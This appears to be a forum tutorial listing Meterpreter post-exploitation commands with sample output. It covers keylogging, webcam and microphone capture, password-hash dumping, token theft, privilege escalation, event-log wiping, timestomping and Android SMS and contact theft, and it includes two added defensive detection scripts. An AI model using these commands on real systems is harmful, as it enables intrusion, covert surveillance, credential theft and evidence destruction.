Since the Meterpreter provides a whole new environment, we will cover some of the basic Meterpreter commands to get you started and help familiarize you with this most powerful tool.

Throughout this thread, almost every available Meterpreter command is covered. For those that aren't covered, experimentation is the key to successful learning, and you are free to ask for help.

List of commands covered:

core commands     File System commands     Networking Commands     User Interface        Other Useful commands
-------------     --------------------     -------------------     --------------        ---------------------
?                 cat                      ifconfig                enumdesktops          webcam_list
background        cd                       portfwd                 getdesktop            webcam_snap
bgkill            del                      route                   idletime              webcam_stream
bgrun             download                                         keyscan_start         record_mic
bglist            edit                     System Commands         keyscan_dump          activity_start
channel           getlwd                   ---------------         keyscan_stop          check_root
close             getwd                    clearev                 screenshot            geolocate
exit              lcd                      drop_token              set_desktop           wlan_geolocate
exploit           lpwd                     execute                 uictl                 dump_calllog
help              ls                       getpid                                        dump_contacts
interact          mkdir                    getprivs                Password hash         dump_sms
irb               pwd                      getuid                  -------------         send_sms
migrate           rm                       kill                    hashdump
quit              rmdir                    ps                      
read              upload                   reboot                  Timestomp commands
run               search                   reg                     ------------------
resource                                   rev2self                timestomp
use                                        shell
write                                      shutdown                Privilege Escalation
                                           steal_token             --------------------
                                           sys_info                getsystem

Note: bookmark this page, as it is possibly the most complete cheat sheet of Meterpreter commands found anywhere on the web, so you'll want to refer back to it often.

Core commands


The ? command, as may be expected, displays the Meterpreter help menu.

  meterpreter > ?
  Core Commands
  Command       Description
  -------       -----------
  ?             Help menu
  background    Backgrounds the current session
  channel       Displays information about active channels


The background command will send the current Meterpreter session to the background and return you to the ‘msf’ prompt. To get back to your Meterpreter session, just interact with it again.

  meterpreter > background
  msf exploit(ms08_067_netapi) > sessions -i 1
  [*] Starting interaction with 1...


The bgkill command kills a background meterpreter script


The bgrun command runs a script as a background thread


The bglist command provides a list of all running background scripts


The channel command displays all active channels


The close command closes a channel


The exit command terminates a meterpreter session


The exploit command executes the meterpreter script designated after it


The help command, like the ? command, displays the Meterpreter help menu.


The interact command interacts with a channel.


The irb command switches into Ruby scripting mode

  meterpreter > irb
  [*] Starting IRB shell
  [*] The 'client' variable holds the meterpreter client


Using the migrate post module, you can migrate to another process on the victim.

 meterpreter > run post/windows/manage/migrate 
 [*] Running module against V-MAC-XP
 [*] Current server process: svchost.exe (1076)
 [*] Migrating to explorer.exe...
 [*] Migrating into process ID 816
 [*] New server process: Explorer.EXE (816)


The quit command terminates the meterpreter session


The read command reads data from a channel.


The run command executes the Meterpreter script designated after it.


The resource command executes Meterpreter instructions stored in a text file. The file contains one entry per line, and resource executes each line in sequence. This can help automate repetitive actions performed by a user. By default, the commands run in the current working directory (on the target machine), and the resource file is read from the local working directory (on the attacking machine).

 meterpreter > resource 
 Usage: resource path1 path2
 Run the commands stored in the supplied files.


The use command loads a meterpreter extension


The write command writes data to a channel.

File system commands


The cat command is identical to the command found on *nix systems. It displays the content of a file when it’s given as an argument.

  meterpreter > cat edit.txt
  What you talkin' about Willis


The change directory “cd” works the same way as it does under DOS and *nix systems.

 meterpreter > cd c:\windows
 meterpreter > pwd


The del command deletes a file on the victim.


The download command downloads a file from the remote machine. Note the use of the double-slashes when giving the Windows path. The -r option allows you to do so recursively.

  meterpreter > download c:\\boot.ini
  [*] downloading: c:\boot.ini -> c:\boot.ini
  [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini


The edit command opens a file located on the target host. It uses the 'vim' editor, so all of that editor's commands are available.

 meterpreter > edit edit.txt


The getlwd command prints the local working directory


The lcd command changes the local working directory. Changing the working directory gives your Meterpreter session access to files located in that folder.

 meterpreter > lcd /var/www
 meterpreter > lpwd


The lpwd command displays the local working directory. When receiving a Meterpreter shell, the local working directory is the location where one started the Metasploit console.

 meterpreter > lpwd


As in Linux, the ls command will list the files in the current remote directory.

 meterpreter > ls
 Listing: C:\Documents and Settings\victim
 Mode              Size     Type  Last modified                   Name
 ----              ----     ----  -------------                   ----
 40777/rwxrwxrwx   0        dir   Sat Oct 17 07:40:45 -0600 2009  .
 40777/rwxrwxrwx   0        dir   Fri Jun 19 13:30:00 -0600 2009  ..
 100666/rw-rw-rw-  218      fil   Sat Oct 03 14:45:54 -0600 2009  .recently-used.xbel
 40555/r-xr-xr-x   0        dir   Wed Nov 04 19:44:05 -0700 2009  Application Data


The mkdir command makes a directory on the victim's system.


The pwd command displays the current working directory on the target host. By default, the current working folder is where the connection to your listener was initiated.


The rm command, as on *nix systems, deletes (removes) a file.


The rmdir command, as on *nix systems, deletes (removes) a directory.


As with the download command, you need to use double-slashes with the upload command. It uploads a file to the target system. The -r option allows you to do so recursively.


The search command provides a way of locating specific files on the target host. The command is capable of searching through the whole system or specific folders. Wildcards can also be used when creating the file pattern to search for.

  meterpreter > search -f sea*.bat c:\\xamp\\
  Found 1 result...
  c:\\xampp\perl\bin\search.bat (57035 bytes)

Networking Commands

ifconfig, ipconfig

The ifconfig or ipconfig command displays the network interfaces and addresses on the remote machine.

 meterpreter > ipconfig
 MS TCP Loopback interface
 Hardware MAC: 00:00:00:00:00:00
 IP Address  :
 Netmask     :
 AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport
 Hardware MAC: 00:0c:29:10:f5:15
 IP Address  :
 Netmask     :


The portfwd command forwards a port on the victim system to a remote service


The route command helps to view or modify the victim routing table

System Commands


The clearev command will clear the Application, System, and Security logs on a Windows system. There are no options or arguments.

  meterpreter > clearev
  [*] Wiping 97 records from Application...
  [*] Wiping 415 records from System...
  [*] Wiping 0 records from Security...
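
From the defender's side, clearing a log is itself logged: Windows records event ID 1102 in the Security log when the Security log is cleared and event ID 104 in the System log when another log is cleared. The following detection sketch is an added example, not part of the original post; the JSON field names and sample events are constructed, and it flags hosts where several logs are cleared within a short window, the pattern the output above shows.

```python
import json
from datetime import datetime, timedelta

# Constructed sample (not real data): simplified JSON-lines export of Windows events.
SAMPLE = """\
{"host":"WS01","time":"2024-05-01T10:15:02","channel":"System","event_id":104,"cleared":"Application"}
{"host":"WS01","time":"2024-05-01T10:15:02","channel":"System","event_id":104,"cleared":"System"}
{"host":"WS01","time":"2024-05-01T10:15:03","channel":"Security","event_id":1102,"cleared":"Security"}
{"host":"WS02","time":"2024-05-01T11:00:00","channel":"System","event_id":104,"cleared":"Application"}
{"host":"WS02","time":"2024-05-01T11:00:05","channel":"System","event_id":7036,"cleared":null}
"""

# (channel, event ID) pairs that Windows writes when an event log is cleared.
CLEAR_IDS = {("Security", 1102), ("System", 104)}

def find_bulk_clears(lines, window=timedelta(seconds=10), min_logs=2):
    """Return (host, first_clear_time, cleared_logs) for every burst in which
    at least `min_logs` distinct logs were cleared on one host within `window`."""
    by_host = {}
    for line in lines.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        if (ev["channel"], ev["event_id"]) in CLEAR_IDS:
            when = datetime.fromisoformat(ev["time"])
            by_host.setdefault(ev["host"], []).append((when, ev["cleared"]))
    alerts = []
    for host, clears in sorted(by_host.items()):
        clears.sort()
        start = 0
        while start < len(clears):
            t0, end, logs = clears[start][0], start, set()
            # Collect every clear event that falls inside the window opened at t0.
            while end < len(clears) and clears[end][0] - t0 <= window:
                logs.add(clears[end][1])
                end += 1
            if len(logs) >= min_logs:
                alerts.append((host, t0.isoformat(), sorted(logs)))
            start = end
    return alerts

if __name__ == "__main__":
    for alert in find_bulk_clears(SAMPLE):
        print(alert)
```

Forwarding these two event IDs to a central collector keeps the evidence available even after the local logs are wiped.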


The drop_token command drops a stolen token


The execute command runs a command on the target.

  meterpreter > execute -f cmd.exe -i -H
  Process 38320 created.
  Channel 1 created.
  Microsoft Windows XP [Version 5.1.2600]
  (C) Copyright 1985-2001 Microsoft Corp.


The getpid command gets the current process ID (PID)


The getprivs command gets as many privileges as possible

 meterpreter > getprivs 
 Enabled Process Privileges


The getuid command gets the user that the server is running as on the host.


The kill command terminates a process on the target.


The ps command displays a list of running processes on the target.

 meterpreter > ps
 Process list
 PID   Name                  Path
 ---   ----                  ----
 132   VMwareUser.exe        C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 152   VMwareTray.exe        C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 288   snmp.exe              C:\WINDOWS\System32\snmp.exe


The reboot command reboots the victim computer


The reg command interacts with the victim's registry.


The rev2self command calls RevertToSelf() on the victim machine


The shell command will present you with a standard shell on the target system.

 meterpreter > shell
 Process 39640 created.
 Channel 2 created.
 Microsoft Windows XP [Version 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.


The shutdown command shuts down the victim’s computer


The steal_token command attempts to steal the token of a specified (PID) process


The sys_info command gets the details about the victim computer such as OS and name

User Interface Commands


The enumdesktops command lists all accessible desktops

 meterpreter > enumdesktops
 Enumerating all accessible desktops
 Session  Station   Name
 -------  -------   ----
 0        WinSta0   Default
 0        WinSta0   Disconnect
 0        WinSta0   Winlogon
 0        SAWinSta  SADesktop


The getdesktop command gets the current meterpreter desktop


The idletime command checks to see how long since the victim system has been idle or inactive.

 meterpreter > idletime
 User has been idle for: 5 hours 26 mins 35 secs


The keyscan_start command starts the software keylogger when associated with a process such as Word or a browser.

 meterpreter > keyscan_start
 Starting the keystroke sniffer...


The keyscan_dump command dumps the keystrokes captured by the software keylogger.

 meterpreter > keyscan_dump
 Dumping captured keystrokes...
 tgoogle.cm my credit amex   myusernamthi     amexpasswordpassword


The keyscan_stop command stops the software keylogger


The screenshot command grabs a screenshot of the meterpreter desktop


The set_desktop command changes the meterpreter desktop


The uictl command enables control of some of the user interface components

Privilege Escalation Commands


The getsystem command uses 15 built-in methods to gain sysadmin privileges

Password hash Commands


The hashdump post module will dump the contents of the SAM database.

 meterpreter > run post/windows/gather/hashdump 
 [*] Obtaining the boot key...
 [*] Calculating the hboot key using SYSKEY 8528c78df7ff55040196a9b670f114b6...
 [*] Obtaining the user list and keys...
 [*] Decrypting user keys...
 [*] Dumping password hashes...

Timestomp commands


The timestomp command manipulates the modify, access, and create attributes of a file

 meterpreter > timestomp -h
 Usage: timestomp OPTIONS file_path
 -a   Set the "last accessed" time of the file
 -b        Set the MACE timestamps so that EnCase shows blanks
 -c   Set the "creation" time of the file
 -e   Set the "mft entry modified" time of the file
 -f   Set the MACE of attributes equal to the supplied file
 -h        Help banner
 -m   Set the "last written" time of the file
 -r        Set the MACE timestamps recursively on a directory
 -v        Display the UTC MACE values of the file
 -z   Set all four attributes (MACE) of the file
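
For forensic triage, the MACE values above live in the NTFS $STANDARD_INFORMATION attribute, while the $FILE_NAME attribute carries its own timestamps that API-level changes normally leave alone. The following check is an added example, not part of the original post; the record layout, field names and sample values are constructed, and both tests are common heuristics rather than proof of tampering.

```python
from datetime import datetime

# Constructed sample of parsed MFT records (hypothetical field names, UTC):
# si_* come from $STANDARD_INFORMATION, fn_* from $FILE_NAME.
RECORDS = [
    {"path": r"C:\Users\victim\report.docx",
     "si_created": "2024-03-02T09:14:33.518204",
     "si_modified": "2024-03-05T16:02:11.093311",
     "fn_created": "2024-03-02T09:14:33.518204"},
    {"path": r"C:\Windows\Temp\svc_update.exe",
     "si_created": "2009-07-14T01:14:00.000000",
     "si_modified": "2009-07-14T01:14:00.000000",
     "fn_created": "2024-05-01T10:12:47.771090"},
    {"path": r"C:\Windows\Temp\notes.txt",
     "si_created": "2024-05-01T10:20:00.000000",
     "si_modified": "2024-05-01T10:20:00.000000",
     "fn_created": "2024-05-01T10:20:00.000000"},
]

def timestomp_indicators(rec):
    """Return the list of heuristic indicators that fire for one record."""
    si_created = datetime.fromisoformat(rec["si_created"])
    si_modified = datetime.fromisoformat(rec["si_modified"])
    fn_created = datetime.fromisoformat(rec["fn_created"])
    reasons = []
    # A file cannot have been created before its own $FILE_NAME entry existed.
    if si_created < fn_created:
        reasons.append("si_created_before_fn_created")
    # NTFS stores 100 ns ticks; whole-second values on every field are unusual.
    if si_created.microsecond == 0 and si_modified.microsecond == 0:
        reasons.append("si_whole_second")
    return reasons

def scan(records):
    """Map each suspicious path to its indicators; clean records are omitted."""
    hits = {}
    for rec in records:
        reasons = timestomp_indicators(rec)
        if reasons:
            hits[rec["path"]] = reasons
    return hits

if __name__ == "__main__":
    for path, reasons in scan(RECORDS).items():
        print(path, reasons)
```

A file that trips both indicators deserves a closer look than one that only shows whole-second timestamps, which some legitimate installers and archive tools also produce.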

Some other useful commands


The webcam_list command lists all available webcams on the target machine.

 meterpreter > webcam_list
 1: Creative WebCam NX Pro
 2: Creative WebCam NX Pro (VFW)


The webcam_snap command takes a picture through the webcam.

  meterpreter > webcam_snap -h
  Usage: webcam_snap [options]
  Grab a frame from the specified webcam.
  -h      Help Banner
  -i   The index of the webcam to use (Default: 1)
  -p   The JPEG image path (Default: 'gnFjTnzi.jpeg')
  -q   The JPEG image quality (Default: '50')
  -v   Automatically view the JPEG image (Default: 'true')


The webcam_stream command gets a live stream from the target's webcam.



The record_mic command records audio from the target's microphone.

  meterpreter > record_mic -d 20
  [*] Starting...
  [*] Stopped
  Audio saved to: /Users/user/rapid7/msf/YAUtubCR.wav


The activity_start command starts an Android activity from a URI string.


The check_root command checks whether the target is rooted or not.

  meterpreter > check_root
  [*] Device is not rooted


The geolocate command allows you to locate the phone by retrieving the current lat-long using geolocation.


The wlan_geolocate command allows you to locate the phone by retrieving the current lat-long using WLAN information.

  meterpreter > wlan_geolocate
  [*] Google indicates the device is within 150 meters of 30.*******,-97.*******.
  [*] Google Maps URL:  https://maps.google.com/?q=30.*******,-97.*******


The dump_calllog command retrieves the call log from the Android device.

  meterpreter > dump_calllog
  [*] Fetching 500 entries
  [*] Contacts list saved to: calllog_dump_20160374745744.txt


The dump_contacts command retrieves contacts from the target.

   meterpreter > dump_contacts
   [*] Fetching 5 contacts into list
   [*] Contacts list saved to: contacts_dump_20160308155744.txt

dump_sms, sms_dump

The dump_sms or sms_dump command retrieves the SMS information from the Android device.



The send_sms command allows you to send an SMS from the target device.

  meterpreter > send_sms -d 9678****** -t hacked
  [*] SMS send - Transmission succesfull

Stay Tuned for More Meterpreter Tips…😃

